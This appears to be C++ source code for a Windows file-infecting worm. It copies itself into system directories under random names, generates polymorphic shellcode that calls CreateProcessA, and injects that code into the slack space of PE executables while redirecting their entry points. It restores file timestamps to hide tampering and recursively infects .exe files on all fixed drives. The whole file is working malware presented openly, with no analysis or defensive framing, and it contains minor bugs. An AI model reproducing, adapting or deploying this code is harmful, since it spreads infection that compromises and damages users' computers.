#include "windows.h"
char *InfectCode = NULL;
DWORD aCreateProcess = 0;
char CopyFiles[10][256];
char SysDirBuff[32];//system dir
int GetRand()
{
return rand();
}
int SEU_Rand(int ran)//自定义的随机数发生器
{
unsigned long Time=GetTickCount();
int seed=rand()+3;
seed=(seed*Time)%ran;
return seed;
}
void InItCopyFiles()
{
::GetSystemDirectory(SysDirBuff,32);
char This_File[256];
strcpy(This_File,SysDirBuff);
strcat(This_File,"\\drivers\\svchost.exe");
memset(CopyFiles,0,2560);
strcpy(CopyFiles[0],SysDirBuff);
strcpy(CopyFiles[1],SysDirBuff);
strcpy(CopyFiles[2],SysDirBuff);
strcpy(CopyFiles[3],SysDirBuff);
strcpy(CopyFiles[4],SysDirBuff);
strcat(CopyFiles[4],"\\");
strcat(CopyFiles[3],"\\");
strcat(CopyFiles[2],"\\drivers\\");
strcat(CopyFiles[1],"\\dllcache\\");
strcat(CopyFiles[0],"\\IME\\");
sprintf(CopyFiles[9],"%c:\\Program Files\\Common Files\\Microsoft Shared\\",SysDirBuff[0]);
sprintf(CopyFiles[8],"%c:\\Program Files\\Internet Explorer\\Connection Wizard\\",SysDirBuff[0]);
sprintf(CopyFiles[7],"%c:\\Program Files\\Windows Media Player\\",SysDirBuff[0]);
sprintf(CopyFiles[6],"%c:\\WINDOWS\\addins\\",SysDirBuff[0]);
sprintf(CopyFiles[5],"%c:\\WINDOWS\\system\\",SysDirBuff[0]);
char abc[]="abcdefghijklmnopqrstuvwxyz";
char temp[10];
for (int t=0;t<10;t++)
{
memset(temp,0,10);
for(int i=0;i<5;i++)
{
temp[i]=abc[SEU_Rand(26)];
}
strcat(temp,".exe");
strcat(CopyFiles[t],temp);
::CopyFile(This_File,CopyFiles[t],FALSE);
}
}
/*
Build the thunk code. This is the kernel code.
Parameters:
hostentry:original file's code entry point(RVA)
startaddr:where my thunk code start(RVA)
vname:worm file name, include full path
*/
int BuildInfectCode(const DWORD hostentry, const DWORD startaddr, const char *vname)
{
char *p = InfectCode;
unsigned char t, c1, c2;
int i;
if(0 == aCreateProcess)
aCreateProcess = (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"), "CreateProcessA");
//code body
*p++ = 0x68; //push
*(DWORD *)p = startaddr + 0x42; //seh handler
p += 4;
t = GetRand() % 3; //eax, edx, ecx
*p++ = 0x31 + ((GetRand() && 1) << 1); //xor
*p++ = 0xc0 | (t << 3) | t; //xor reg, reg
*p++ = 0x64; //fs
*p++ = 0xff; //push
*p++ = 0x30 | t;
*p++ = 0x64; //fs
*p++ = 0x89; //mov
*p++ = 0x20 | t; //mov [reg], esp
t = GetRand() % 3; //eax, edx
if(0x01 == t) t = 0; //don't use ecx
*p++ = 0x31 + ((GetRand() && 1) << 1); //xor
*p++ = 0xc0 | (t << 3) | t; //xor reg, reg
*(WORD *)p = 0x106a; //push 10h
p += 2;
*p++ = 0x59; //pop ecx
*p++ = 0x50 | t; //push reg
*(WORD *)p = 0xfde2; //loop $ - 3
p += 2;
*(WORD *)p = 0x446a; //push 44h
p += 2;
c1 = (t + 1) % 3;
for(c2 = 0; c2 < 3; c2++)
if(c2 != t && c2 != c1) break;
*p++ = 0x8b; //mov
*p++ = 0xc4 | (c1 << 3); //mov reg1, esp STARTUPINFO
*(DWORD *)p = 0x8b10ec83; //sub esp, 10h/mov
p += 4;
*p++ = 0xc4 | (c2 << 3); //mov reg2, esp PROCESS_INformATION
*p++ = 0x50 | c2; //push reg2
*p++ = 0x50 | c1; //push reg1
for(i = 0; i < 6; i++)
*p++ = 0x50 | t; //push reg, reg is 0
*p++ = 0x68; //push
*(DWORD *)p = startaddr + 0x54; //virus file name
p += 4;
*p++ = 0x50 | t; //push reg, reg is 0
t = GetRand() % 3; //eax, edx, ecx
*p++ = 0xb8 | t; //mov
*(DWORD *)p = aCreateProcess; //mov reg, aCreateProcess
p += 4;
*p++ = 0xff;
*p++ = 0xd0 | t; //call reg
t = GetRand() % 3; //eax, edx, ecx
*(DWORD *)p = 0x3354c483; //add esp, 54h/xor
p += 4;
*p++ = 0xc0 | (t << 3) | t; //xor reg, reg
*p++ = 0x64; //fs
*p++ = 0x8f; //push
*p++ = t;
*p++ = 0x58 | (GetRand() % 3);
*p++ = 0x68; //push
*(DWORD *)p = hostentry; //host entry
p += 4;
*p++ = 0xc3; //retn
//seh handler
*p++ = 0x68; //push
*(DWORD *)p = hostentry; //host entry
p += 4;
*(DWORD *)p = 0x1024448b; //mov eax, [esp + 10h]
p += 4;
*(WORD *)p = 0x808f; //pop
p += 2;
*(DWORD *)p = 0xb8; //pop [eax + 0b8h]
p += 4;
*(WORD *)p = 0xc033; //xor eax,eax
p += 2;
*p++ = 0xc3; //retn
i = -1;
do {
*p++ = vname[++i];
}while(vname[i] != 0);
return p - InfectCode;
}
void InfectFileHelper(char *buf, const char *vname)
{
char *p = buf, *sec;
DWORD entry, code, t, startaddr, base;
int i, seccount, clen;
if(NULL == InfectCode)
InfectCode = new char[4096];
try {
if(*(WORD *)p != 0x5a4d) return;
p = buf + *(WORD *)(p + 0x3c);
if(*(WORD *)p != 0x4550) return;
t = *(WORD *)(p + 0x5c);
if(t != 0x02 && t != 0x03) return;
entry = *(DWORD *)(p + 0x28);
sec = p + 0x100;
seccount = *(WORD *)(p + 6);
for(i = 0; i < seccount; i++) {
if(*(DWORD *)(sec + 4) <= entry
&& *(DWORD *)sec + *(DWORD *)(sec + 4) > entry)
break;
sec += 0x28;
}
if(i >= seccount - 1)
return; //assume the code section is not the last one
t = *(DWORD *)(sec + 0x08);
if(*(DWORD *)sec < t) t = *(DWORD *)sec;
startaddr = *(DWORD *)(sec + 0x04) + t;
base = *(DWORD *)(p + 0x34);
clen = BuildInfectCode(entry + base, startaddr + base, vname);
code = t + *(DWORD *)(sec + 0x0c);
if(*(DWORD *)(sec + 0x28 + 0x0c)
<= code + clen)
return; //no enough room
MoveMemory(buf + code, InfectCode, clen);
*(DWORD *)(p + 0x28) = startaddr;
}
catch(...) {
}
}
void InfectFile(const char *filename, const char *vname)
{
HANDLE fh, fm;
DWORD fa = GetFileAttributes(filename);
FILETIME ft[3];
char *buf;
SetFileAttributes(filename, FILE_ATTRIBUTE_NORMAL);
GetFileTime(fh, ft, ft + 1, ft + 2);
fh = CreateFile(filename, GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, 0);
if(INVALID_HANDLE_VALUE == fh) goto end;
fm = CreateFileMapping(fh, NULL, PAGE_READWRITE, 0, 0, NULL);
if(fm != NULL) {
buf = (char *)MapViewOfFile(fm, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, 0);
if(buf != NULL) {
InfectFileHelper(buf, vname);
UnmapViewOfFile(buf);
}
CloseHandle(fm);
}
CloseHandle(fh);
end:
SetFileAttributes(filename, fa);
SetFileTime(fh, ft, ft + 1, ft + 2);
}
void InfectAllFiles(char * lpPath)
{
if (lpPath[0]==SysDirBuff[0])
{//系统盘才考虑
if (strstr(lpPath,"Windows Media Player")!=NULL)
return;
if (strstr(lpPath,"Outlook Express")!=NULL)
return;
if (strstr(lpPath,"Internet Explorer")!=NULL)
return;
if (strstr(lpPath,"NetMeeting")!=NULL)
return;
if (strstr(lpPath,"ComPlus Applications;Messenger")!=NULL)
return;
if (strstr(lpPath,"WINNT")!=NULL)
return;
if (strstr(lpPath,"Documents and Settings")!=NULL)
return;
if (strstr(lpPath,"System Volume Information")!=NULL)
return;
if (strstr(lpPath,"Recycled")!=NULL)
return;
if (strstr(lpPath,"Windows NT")!=NULL)
return;
if (strstr(lpPath,"WindowsUpdate")!=NULL)
return;
if (strstr(lpPath,"Messenger")!=NULL)
return;
if (strstr(lpPath,"Microsoft Frontpage")!=NULL)
return;
if (strstr(lpPath,"Movie Maker")!=NULL)
return;
if (strstr(lpPath,"NetMeeting")!=NULL)
return;
if (strstr(lpPath,"WINDOWS")!=NULL)
return;
}
char szFind[MAX_PATH];
WIN32_FIND_DATA FindFileData;
strcpy(szFind,lpPath);
strcat(szFind,"\\*.*");
HANDLE hFind=::FindFirstFile(szFind,&FindFileData);
if(INVALID_HANDLE_VALUE == hFind)
return;
while(TRUE)
{
//If director, visit all sub-folders
if(FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
if(FindFileData.cFileName[0]!='.')
{
char szFile[MAX_PATH];
strcpy(szFile,lpPath);
strcat(szFile,"\\");
strcat(szFile,FindFileData.cFileName);
InfectAllFiles(szFile);
}
}
else
{
//worm if exe file
int len = strlen(FindFileData.cFileName);
const char *p = (char *)&FindFileData.cFileName[len-3];
if (_stricmp(p, "exe") == 0) //case insentive!
{
char strFileName[MAX_PATH];
strcpy(strFileName,lpPath);
strcat(strFileName,"\\");
strcat(strFileName,FindFileData.cFileName);
//感染文件
InfectFile(strFileName,CopyFiles[SEU_Rand(10)]);
}
}
//Find next file
if(!FindNextFile(hFind,&FindFileData))
break;
}
FindClose(hFind);
}
void WormComputer()
{
InItCopyFiles();
srand(GetTickCount());
for (char cLabel='c'; cLabel<='z'; cLabel++)
{
char strRootPath[] = {"c:\\"};
strRootPath[0] = cLabel;
if(GetDriveType(strRootPath)== DRIVE_FIXED)
{
strRootPath[2] = '\0'; //"c:"
InfectAllFiles(strRootPath);
}
}
}
unsigned long CALLBACK Worm_thread(LPVOID dParam)
{
WormComputer();
return 1;
}